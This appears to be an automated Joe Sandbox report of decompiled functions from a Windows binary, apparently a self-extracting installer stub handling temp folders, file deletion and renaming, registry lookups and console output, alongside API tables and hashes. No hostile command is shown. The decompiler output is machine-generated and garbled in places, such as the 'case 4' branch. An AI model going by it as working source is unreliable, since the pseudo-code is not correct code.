0x0100955b
0x0100955b
0x0100955e
0x00000000
0x00000000
0x00000000
0x00000000
0x0100955e
0x00000000
0x01009559
0x01009572
0x01009577
0x01009582
0x0100959d
0x00000000
0x0100959f
0x010095a5
0x010095ab
0x010095b5
0x010095b7
0x010095b9
0x010095c5
0x010095c5
0x010095d5
0x010095dd
0x010095e5
0x010095f0
0x010095f0
0x010095fb
0x01009600
0x01009600
0x0100959d
0x010094e8
0x010094d3
0x010094c2
0x0100949a
0x01009492
0x01009606
0x0100960c
0x01009616

APIs

__EH_prolog.LIBCMT ref: 01009448
GetLongPathNameW.KERNEL32 ref: 0100946B
GetShortPathNameW.KERNEL32 ref: 0100948A

Part of subcall function 010117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0100BB05,00000000,.exe,?,?,00000800,?,?,010185DF,?), ref: 010117C2

_swprintf.LIBCMT ref: 01009526

Part of subcall function 0100400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0100401D

MoveFileW.KERNEL32(?,?), ref: 01009595
MoveFileW.KERNEL32(?,?), ref: 010095D5

Strings

rtmp%d, xrefs: 0100950F

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
String ID: rtmp%d
API String ID: 2111052971-3303766350
Opcode ID: 4a4c5fbdcd9a553f85b3e8734488c6d5c86763fe183362c74486ac0ae53971fa
Instruction ID: 60363507c9618e6a1f199a0465d878564daff5b13221bddf47f68903ff6806c6
Opcode Fuzzy Hash: 4a4c5fbdcd9a553f85b3e8734488c6d5c86763fe183362c74486ac0ae53971fa
Instruction Fuzzy Hash: 2141637590025966EB32EB648C84EDF777CAF54384F0444E5B6CDA3082EE348B88CB60

Uniqueness

Uniqueness Score: -1.00%

Function 01010A8A, Relevance: 12.1, APIs: 8, Instructions: 115
timeCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E01010A8A(intOrPtr* __ecx, intOrPtr __edx, void* __eflags, signed int* _a4) {
				struct _SYSTEMTIME _v16;
				struct _SYSTEMTIME _v32;
				struct _SYSTEMTIME _v48;
				struct _FILETIME _v56;
				struct _FILETIME _v64;
				struct _FILETIME _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _t73;
				void* _t81;
				signed int _t85;
				void* _t86;
				intOrPtr _t87;
				intOrPtr* _t89;
				intOrPtr* _t90;
				signed int* _t91;
				signed int _t92;

				_t87 = __edx;
				_t90 = __ecx;
				_v80 = E0101E900( *__ecx,  *((intOrPtr*)(__ecx + 4)), 0x64, 0);
				_v76 = _t87;
				if(E0100ACF5() >= 0x600) {
					FileTimeToSystemTime( &_v64,  &_v32);
					SystemTimeToTzSpecificLocalTime(0,  &_v32,  &_v16);
					SystemTimeToFileTime( &_v16,  &_v72);
					SystemTimeToFileTime( &_v32,  &_v56);
					asm("sbb ecx, [esp+0x24]");
					asm("sbb ecx, ebx");
					asm("adc ecx, ebx");
					_v72.dwLowDateTime = 0 - _v56.dwLowDateTime + _v72.dwLowDateTime + _v64.dwLowDateTime;
					asm("adc ecx, ebx");
					_v72.dwHighDateTime = _v72.dwHighDateTime + _v64.dwHighDateTime;
				} else {
					FileTimeToLocalFileTime( &_v64,  &_v72);
				}
				FileTimeToSystemTime( &_v72,  &_v48);
				_t91 = _a4;
				_t81 = 1;
				_t85 = _v48.wDay & 0x0000ffff;
				_t92 = _v48.wMonth & 0x0000ffff;
				_t88 = _v48.wYear & 0x0000ffff;
				_t91[3] = _v48.wHour & 0x0000ffff;
				_t91[4] = _v48.wMinute & 0x0000ffff;
				_t91[5] = _v48.wSecond & 0x0000ffff;
				_t91[7] = _v48.wDayOfWeek & 0x0000ffff;
				 *_t91 = _v48.wYear & 0x0000ffff;
				_t91[1] = _t92;
				_t91[2] = _t85;
				_t91[8] = _t85 - 1;
				if(_t92 > 1) {
					_t89 = 0x103e084;
					_t86 = 4;
					while(_t86 <= 0x30) {
						_t86 = _t86 + 4;
						_t91[8] = _t91[8] +  *_t89;
						_t89 = _t89 + 4;
						_t81 = _t81 + 1;
						if(_t81 < _t92) {
							continue;
						}
						break;
					}
					_t88 = _v48.wYear & 0x0000ffff;
				}
				if(_t92 > 2 && E01010BF7(_t88) != 0) {
					_t91[8] = _t91[8] + 1;
				}
				_t73 = E0101E970( *_t90,  *((intOrPtr*)(_t90 + 4)), 0x3b9aca00, 0);
				_t91[6] = _t73;
				return _t73;
			}

0x01010a8a
0x01010a91
0x01010aa2
0x01010aa6
0x01010ab4
0x01010ad2
0x01010ae3
0x01010af3
0x01010b03
0x01010b15
0x01010b1d
0x01010b23
0x01010b29
0x01010b2d
0x01010b2f
0x01010ab6
0x01010ac0
0x01010ac0
0x01010b3d
0x01010b43
0x01010b4e
0x01010b4f
0x01010b54
0x01010b59
0x01010b5e
0x01010b66
0x01010b6e
0x01010b76
0x01010b7c
0x01010b7e
0x01010b81
0x01010b84
0x01010b89
0x01010b8d
0x01010b92
0x01010b93
0x01010b9a
0x01010b9d
0x01010ba0
0x01010ba3
0x01010ba6
0x00000000
0x00000000
0x00000000
0x01010ba6
0x01010ba8
0x01010ba8
0x01010bb0
0x01010bbc
0x01010bbc
0x01010bcb
0x01010bd1
0x01010bda

APIs

__aulldiv.LIBCMT ref: 01010A9D

Part of subcall function 0100ACF5: GetVersionExW.KERNEL32(?), ref: 0100AD1A

FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 01010AC0
FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 01010AD2
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 01010AE3
SystemTimeToFileTime.KERNEL32(?,?), ref: 01010AF3
SystemTimeToFileTime.KERNEL32(?,?), ref: 01010B03
FileTimeToSystemTime.KERNEL32(?,?), ref: 01010B3D
__aullrem.LIBCMT ref: 01010BCB

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: 51a1b21c951ffb5127008880daeb2fbcf2dc20b420c66d8357120186abc978a5
Instruction ID: 8888f1846aad061ead81feb09d07e6e1d57589657b52d88493393ce93cbd772a
Opcode Fuzzy Hash: 51a1b21c951ffb5127008880daeb2fbcf2dc20b420c66d8357120186abc978a5
Instruction Fuzzy Hash: 0D413AB14083069FC324DF64C8809ABFBF8FF88615F004A2EF5D692644E739E588CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0102EE2D, Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0102EE2D(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;

				_t78 =  *0x103e668; // 0x7ecdc17e
				_v8 = _t78 ^ _t136;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x1061298 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t135 = _a4;
				_v60 = _t86;
				 *_t135 = 0;
				 *((intOrPtr*)(_t135 + 4)) = 0;
				 *((intOrPtr*)(_t135 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x1061298 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E01029F27(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x1061298 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x1061298 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x1061298 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
							} else {
								_t112 = E01028ADA( &_v28, _t133, 2);
								_t137 = _t137 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E01028ADA();
						_t137 = _t137 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t135 = GetLastError();
								} else {
									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E0101EC4A(_v8 ^ _t136);
			}

0x0102ee35
0x0102ee3c
0x0102ee3f
0x0102ee47
0x0102ee4b
0x0102ee57
0x0102ee5a
0x0102ee5d
0x0102ee64
0x0102ee6c
0x0102ee6f
0x0102ee75
0x0102ee7b
0x0102ee80
0x0102ee82
0x0102ee85
0x0102ee8a
0x0102ee94
0x0102ee9b
0x0102ee9e
0x0102eea5
0x0102eeac
0x0102eed8
0x0102eefe
0x0102ef00
0x00000000
0x0102eeda
0x0102eedd
0x0102efa4
0x0102efb0
0x0102efbb
0x0102efc0
0x0102eee3
0x0102eeea
0x0102eeef
0x0102eef5
0x0102eefb
0x00000000
0x0102eefb
0x0102eef5
0x0102eedd
0x0102eeae
0x0102eeb2
0x0102eeb5
0x0102eebb
0x0102eebd
0x0102eec0
0x0102eec4
0x0102ef01
0x0102ef04
0x0102ef05
0x0102ef0a
0x0102ef10
0x0102ef16
0x0102ef25
0x0102ef2b
0x0102ef31
0x0102ef36
0x0102ef52
0x0102efc5
0x0102efcb
0x0102ef54
0x0102ef5c
0x0102ef65
0x0102ef6b
0x00000000
0x0102ef6d
0x0102ef6f
0x0102ef72
0x0102ef8b
0x00000000
0x0102ef8d
0x0102ef91
0x0102ef93
0x0102ef96
0x00000000
0x0102ef96
0x0102ef91
0x0102ef8b
0x0102ef6b
0x0102ef65
0x0102ef52
0x0102ef36
0x0102ef10
0x00000000
0x0102ef99
0x0102ef99
0x0102efcd
0x0102efdf

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0102F5A2,?,00000000,?,00000000,00000000), ref: 0102EE6F
__fassign.LIBCMT ref: 0102EEEA
__fassign.LIBCMT ref: 0102EF05
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0102EF2B
WriteFile.KERNEL32(?,?,00000000,0102F5A2,00000000,?,?,?,?,?,?,?,?,?,0102F5A2,?), ref: 0102EF4A
WriteFile.KERNEL32(?,?,00000001,0102F5A2,00000000,?,?,?,?,?,?,?,?,?,0102F5A2,?), ref: 0102EF83

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: bb0319ab0347e8dbecef7c483f801a8a0e85d9bfd6407c85b674344ae0288972
Instruction ID: b1d54e29c029b99b149cd4921b955bc32cfbd96d4a477a93ab26538c08127fa9
Opcode Fuzzy Hash: bb0319ab0347e8dbecef7c483f801a8a0e85d9bfd6407c85b674344ae0288972
Instruction Fuzzy Hash: 6251D3B1A002199FDB10CFA8D885EEEFBF9FF09310F24455AE995E7281D731A940CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0101C534, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E0101C534(intOrPtr __ebx, void* __ecx) {
				intOrPtr _t220;
				void* _t221;
				intOrPtr _t272;
				signed int _t286;
				void* _t289;
				signed int _t290;
				void* _t294;

				L0:
				while(1) {
					L0:
					_t272 = __ebx;
					if(__ebx != 1) {
						goto L122;
					}
					L106:
					__eax = __ebp - 0x7d50;
					__edi = 0x800;
					GetTempPathW(0x800, __ebp - 0x7d50) = __ebp - 0x7d50;
					E0100B207(__eflags, __ebp - 0x7d50, 0x800) = 0;
					__esi = 0;
					_push(0);
					while(1) {
						L108:
						_push( *0x103e5f8);
						__ebp - 0x7d50 = E0100400A(0x104946a, __edi, L"%s%s%u", __ebp - 0x7d50);
						__eax = E0100A180(0x104946a);
						__eflags = __al;
						if(__al == 0) {
							break;
						}
						L107:
						__esi =  &(__esi->i);
						__eflags = __esi;
						_push(__esi);
					}
					L109:
					__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0x104946a);
					__eflags =  *(__ebp - 0x3508);
					if( *(__ebp - 0x3508) == 0) {
						while(1) {
							L172:
							_push(0x1000);
							_t208 = _t294 - 0x15; // 0xffffcae3
							_t209 = _t294 - 0xd; // 0xffffcaeb
							_t210 = _t294 - 0x3508; // 0xffff95f0
							_t211 = _t294 - 0xfd58; // 0xfffecda0
							_push( *((intOrPtr*)(_t294 + 0xc)));
							_t220 = E0101AA36();
							_t272 =  *((intOrPtr*)(_t294 + 0x10));
							 *((intOrPtr*)(_t294 + 0xc)) = _t220;
							if(_t220 != 0) {
								_t221 = _t294 - 0x3508;
								_t289 = _t294 - 0x1bd58;
								_t286 = 6;
								goto L2;
							} else {
								break;
							}
							L4:
							while(E010117AC(_t294 - 0xfd58,  *((intOrPtr*)(0x103e618 + _t290 * 4))) != 0) {
								_t290 = _t290 + 1;
								if(_t290 < 0xe) {
									continue;
								} else {
									goto L172;
								}
							}
							__eflags = _t290 - 0xd;
							if(__eflags > 0) {
								continue;
							}
							L8:
							switch( *((intOrPtr*)(_t290 * 4 +  &M0101CAA1))) {
								case 0:
									L9:
									__eflags = _t272 - 2;
									if(_t272 == 2) {
										E01019DA4(_t294 - 0x7d50, 0x800);
										E0100A49D(E0100B965(_t294 - 0x7d50, _t294 - 0x3508, _t294 - 0xdd58, 0x800), _t272, _t294 - 0x8d58, _t290);
										 *(_t294 - 4) = 0;
										E0100A5D7(_t294 - 0x8d58, _t294 - 0xdd58);
										E010070BF(_t294 - 0x5d50);
										while(1) {
											L23:
											_push(0);
											_t280 = _t294 - 0x8d58;
											_t235 = E0100A52A(_t294 - 0x8d58, _t285, _t294 - 0x5d50);
											__eflags = _t235;
											if(_t235 == 0) {
												break;
											}
											L11:
											SetFileAttributesW(_t294 - 0x5d50, 0);
											__eflags =  *(_t294 - 0x4d44);
											if(__eflags == 0) {
												L16:
												_t239 = GetFileAttributesW(_t294 - 0x5d50);
												__eflags = _t239 - 0xffffffff;
												if(_t239 == 0xffffffff) {
													continue;
												}
												L17:
												_t241 = DeleteFileW(_t294 - 0x5d50);
												__eflags = _t241;
												if(_t241 != 0) {
													continue;
												} else {
													_t292 = 0;
													_push(0);
													goto L20;
													L20:
													E0100400A(_t294 - 0x1108, 0x800, L"%s.%d.tmp", _t294 - 0x5d50);
													_t296 = _t296 + 0x14;
													_t246 = GetFileAttributesW(_t294 - 0x1108);
													__eflags = _t246 - 0xffffffff;
													if(_t246 != 0xffffffff) {
														_t292 = _t292 + 1;
														__eflags = _t292;
														_push(_t292);
														goto L20;
													} else {
														_t249 = MoveFileW(_t294 - 0x5d50, _t294 - 0x1108);
														__eflags = _t249;
														if(_t249 != 0) {
															MoveFileExW(_t294 - 0x1108, 0, 4);
														}
														continue;
													}
												}
											}
											L12:
											E0100B4F7(_t280, __eflags, _t294 - 0x7d50, _t294 - 0x1108, 0x800);
											E0100B207(__eflags, _t294 - 0x1108, 0x800);
											_t293 = E010235B3(_t294 - 0x7d50);
											__eflags = _t293 - 4;
											if(_t293 < 4) {
												L14:
												_t260 = E0100B925(_t294 - 0x3508);
												__eflags = _t260;
												if(_t260 != 0) {
													break;
												}
												L15:
												_t263 = E010235B3(_t294 - 0x5d50);
												__eflags = 0;
												 *((short*)(_t294 + _t263 * 2 - 0x5d4e)) = 0;
												E0101F350(0x800, _t294 - 0x40, 0, 0x1e);
												_t296 = _t296 + 0x10;
												 *((intOrPtr*)(_t294 - 0x3c)) = 3;
												_push(0x14);
												_pop(_t266);
												 *((short*)(_t294 - 0x30)) = _t266;
												 *((intOrPtr*)(_t294 - 0x38)) = _t294 - 0x5d50;
												_push(_t294 - 0x40);
												 *0x1062074();
												goto L16;
											}
											L13:
											_t271 = E010235B3(_t294 - 0x1108);
											__eflags = _t293 - _t271;
											if(_t293 > _t271) {
												goto L15;
											}
											goto L14;
										}
										L24:
										 *(_t294 - 4) =  *(_t294 - 4) | 0xffffffff;
										E0100A4B3(_t294 - 0x8d58);
									}
									goto L172;
								case 1:
									L25:
									__eflags = __ebx;
									if(__ebx == 0) {
										__eax = E010235B3(__esi);
										__eax = __eax + __edi;
										_push(__eax);
										_push( *0x105dc84);
										__eax = E010235DE(__ecx, __edx);
										__esp = __esp + 0xc;
										__eflags = __eax;
										if(__eax != 0) {
											__eax = E01027168(__eax, __esi);
											_pop(__ecx);
											_pop(__ecx);
										}
										__eflags = __bh;
										if(__bh == 0) {
											__eax = L010235CE(__esi);
										}
									}
									goto L172;
								case 2:
									L39:
									__eflags = __ebx;
									if(__ebx == 0) {
										__ebp - 0x3508 = SetWindowTextW( *(__ebp + 8), __ebp - 0x3508);
									}
									goto L172;
								case 3:
									L41:
									__eflags = __ebx;
									if(__ebx != 0) {
										goto L172;
									}
									L42:
									__eflags =  *0x104a472 - __di;
									if( *0x104a472 != __di) {
										goto L172;
									}
									L43:
									__eax = 0;
									__edi = __ebp - 0x3508;
									_push(0x22);
									 *(__ebp - 0x1108) = __ax;
									_pop(__eax);
									__eflags =  *(__ebp - 0x3508) - __ax;
									if( *(__ebp - 0x3508) == __ax) {
										__edi = __ebp - 0x3506;
									}
									__eax = E010235B3(__edi);
									__esi = 0x800;
									__eflags = __eax - 0x800;
									if(__eax >= 0x800) {
										goto L172;
									} else {
										L46:
										__eax =  *__edi & 0x0000ffff;
										_push(0x5c);
										_pop(__ecx);
										__eflags = ( *__edi & 0x0000ffff) - 0x2e;
										if(( *__edi & 0x0000ffff) != 0x2e) {
											L50:
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												L62:
												__ebp - 0x1108 = E0100FE56(__ebp - 0x1108, __edi, __esi);
												__ebx = 0;
												__eflags = 0;
												L63:
												_push(0x22);
												_pop(__eax);
												__eax = __ebp - 0x1108;
												__eax = E010217CB(__ebp - 0x1108, __ebp - 0x1108);
												_pop(__ecx);
												_pop(__ecx);
												__eflags = __eax;
												if(__eax != 0) {
													__eflags =  *(__eax + 2) - __bx;
													if( *(__eax + 2) == __bx) {
														__ecx = 0;
														__eflags = 0;
														 *__eax = __cx;
													}
												}
												__eax = __ebp - 0x1108;
												__edi = 0x104a472;
												E0100FE56(0x104a472, __ebp - 0x1108, __esi) = __ebp - 0x1108;
												__eax = E0101A8D0(__ebp - 0x1108, __esi);
												__esi = GetDlgItem( *(__ebp + 8), 0x66);
												__ebp - 0x1108 = SetWindowTextW(__esi, __ebp - 0x1108); // executed
												__eax = SendMessageW(__esi, 0x143, __ebx, 0x104a472); // executed
												__eax = __ebp - 0x1108;
												__eax = E010235E9(__ebp - 0x1108, 0x104a472, __eax);
												_pop(__ecx);
												_pop(__ecx);
												__eflags = __eax;
												if(__eax != 0) {
													__ebp - 0x1108 = SendMessageW(__esi, 0x143, __ebx, __ebp - 0x1108);
												}
												goto L172;
											}
											L51:
											__eflags = __ax;
											if(__ax == 0) {
												L53:
												__eax = __ebp - 0x1c;
												__ebx = 0;
												_push(__ebp - 0x1c);
												_push(1);
												_push(0);
												_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
												_push(0x80000002);
												__eax =  *0x1062028();
												__eflags = __eax;
												if(__eax == 0) {
													__eax = __ebp - 0x14;
													 *(__ebp - 0x14) = 0x1000;
													_push(__ebp - 0x14);
													__eax = __ebp - 0x1108;
													_push(__ebp - 0x1108);
													__eax = __ebp - 0x20;
													_push(__ebp - 0x20);
													_push(0);
													_push(L"ProgramFilesDir");
													_push( *(__ebp - 0x1c));
													__eax =  *0x1062024();
													_push( *(__ebp - 0x1c));
													 *0x1062004() =  *(__ebp - 0x14);
													__ecx = 0x7ff;
													__eax =  *(__ebp - 0x14) >> 1;
													__eflags = __eax - 0x7ff;
													if(__eax >= 0x7ff) {
														__eax = 0x7ff;
													}
													__ecx = 0;
													__eflags = 0;
													 *((short*)(__ebp + __eax * 2 - 0x1108)) = __cx;
												}
												__eflags =  *(__ebp - 0x1108) - __bx;
												if( *(__ebp - 0x1108) != __bx) {
													__eax = __ebp - 0x1108;
													__eax = E010235B3(__ebp - 0x1108);
													_push(0x5c);
													_pop(__ecx);
													__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x110a)) - __cx;
													if(__eflags != 0) {
														__ebp - 0x1108 = E0100FE2E(__eflags, __ebp - 0x1108, "\\", __esi);
													}
												}
												__esi = E010235B3(__edi);
												__eax = __ebp - 0x1108;
												__eflags = __esi - 0x7ff;
												__esi = 0x800;
												if(__eflags < 0) {
													__ebp - 0x1108 = E0100FE2E(__eflags, __ebp - 0x1108, __edi, 0x800);
												}
												goto L63;
											}
											L52:
											__eflags =  *((short*)(__edi + 2)) - 0x3a;
											if( *((short*)(__edi + 2)) == 0x3a) {
												goto L62;
											}
											goto L53;
										}
										L47:
										__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
										if( *((intOrPtr*)(__edi + 2)) != __cx) {
											goto L50;
										}
										L48:
										__edi = __edi + 4;
										__ebx = 0;
										__eflags =  *__edi - __bx;
										if( *__edi == __bx) {
											goto L172;
										} else {
											__ebp - 0x1108 = E0100FE56(__ebp - 0x1108, __edi, 0x800);
											goto L63;
										}
									}
								case 4:
									L68:
									__eflags =  *0x104a46c - 1;
									__eflags = __eax - 0x104a46c;
									 *__edi =  *__edi + __ecx;
									__eflags =  *__edi & __cl;
									_pop(es);
									 *__eax =  *__eax + __al;
									__eflags =  *__eax;
								case 5:
									L73:
									__eax =  *(__ebp - 0x3508) & 0x0000ffff;
									__ecx = 0;
									__eax =  *(__ebp - 0x3508) & 0x0000ffff;
									__eflags = __eax;
									if(__eax == 0) {
										L80:
										 *0x1048453 = __cl;
										 *0x1048460 = 1;
										goto L172;
									}
									L74:
									__eax = __eax - 0x30;
									__eflags = __eax;
									if(__eax == 0) {
										L78:
										 *0x1048453 = __cl;
										L79:
										 *0x1048460 = __cl;
										goto L172;
									}
									L75:
									__eax = __eax - 1;
									__eflags = __eax;
									if(__eax == 0) {
										goto L80;
									}
									L76:
									__eax = __eax - 1;
									__eflags = __eax;
									if(__eax != 0) {
										goto L172;
									}
									L77:
									 *0x1048453 = 1;
									goto L79;
								case 6:
									L86:
									__edi = 0;
									 *0x105ec98 = 1;
									__edi = 1;
									__ebx = __ebp - 0x3508;
									__eflags =  *(__ebp - 0x3508) - 0x3c;
									if( *(__ebp - 0x3508) != 0x3c) {
										L97:
										__eflags =  *((intOrPtr*)(__ebp + 0x10)) - 5;
										if( *((intOrPtr*)(__ebp + 0x10)) != 5) {
											L100:
											__eflags =  *((intOrPtr*)(__ebp + 0x10)) - 4;
											if( *((intOrPtr*)(__ebp + 0x10)) == 4) {
												__eflags = __esi - 6;
												if(__esi == 6) {
													0 = E0101CE22(__ebp,  *(__ebp + 8), __ebx, __edi, 0);
												}
											}
											goto L172;
										}
										L98:
										__eflags = __esi - 9;
										if(__esi != 9) {
											goto L172;
										}
										L99:
										__eax = E0101CE22(__ebp,  *(__ebp + 8), __ebx, __edi, 1);
										goto L100;
									}
									L87:
									__eax = __ebp - 0x3506;
									_push(0x3e);
									_push(__ebp - 0x3506);
									__eax = E010215E8(__ecx);
									_pop(__ecx);
									_pop(__ecx);
									__eflags = __eax;
									if(__eax == 0) {
										goto L97;
									}
									L88:
									_t101 = __eax + 2; // 0x2
									__ecx = _t101;
									 *(__ebp - 0x14) = _t101;
									__ecx = 0;
									__eflags = 0;
									 *__eax = __cx;
									__eax = __ebp - 0x108;
									_push(0x64);
									_push(__ebp - 0x108);
									__eax = __ebp - 0x3506;
									_push(__ebp - 0x3506);
									while(1) {
										L89:
										__ebx = E0101A6C7();
										__eflags = __ebx;
										if(__ebx == 0) {
											break;
										}
										L90:
										__eflags =  *(__ebp - 0x108);
										if( *(__ebp - 0x108) == 0) {
											break;
										}
										L91:
										__eax = __ebp - 0x108;
										__eax = E010117AC(__ebp - 0x108, L"HIDE");
										__eax =  ~__eax;
										asm("sbb eax, eax");
										__edi = __edi & __eax;
										__eax = __ebp - 0x108;
										__eax = E010117AC(__ebp - 0x108, L"MAX");
										__eflags = __eax;
										if(__eax == 0) {
											_push(3);
											_pop(__edi);
										}
										__eax = __ebp - 0x108;
										__eax = E010117AC(__ebp - 0x108, L"MIN");
										__eflags = __eax;
										if(__eax == 0) {
											_push(6);
											_pop(__edi);
										}
										_push(0x64);
										__eax = __ebp - 0x108;
										_push(__ebp - 0x108);
										_push(__ebx);
									}
									L96:
									__ebx =  *(__ebp - 0x14);
									goto L97;
								case 7:
									goto L0;
								case 8:
									L126:
									__eflags = __ebx - 3;
									if(__ebx == 3) {
										__eflags =  *(__ebp - 0x3508) - __di;
										if(__eflags != 0) {
											__eax = __ebp - 0x3508;
											_push(__ebp - 0x3508);
											__eax = E01027107(__ebx, __edi);
											_pop(__ecx);
											 *0x105ec94 = __eax;
										}
										__eax = __ebp + 0xc;
										_push(__ebp + 0xc);
										 *0x105ec90 = E0101AB9A(__ecx, __edx, __eflags);
									}
									 *0x1056b7b = 1;
									goto L172;
								case 9:
									L131:
									__eflags = __ebx - 6;
									if(__ebx != 6) {
										goto L172;
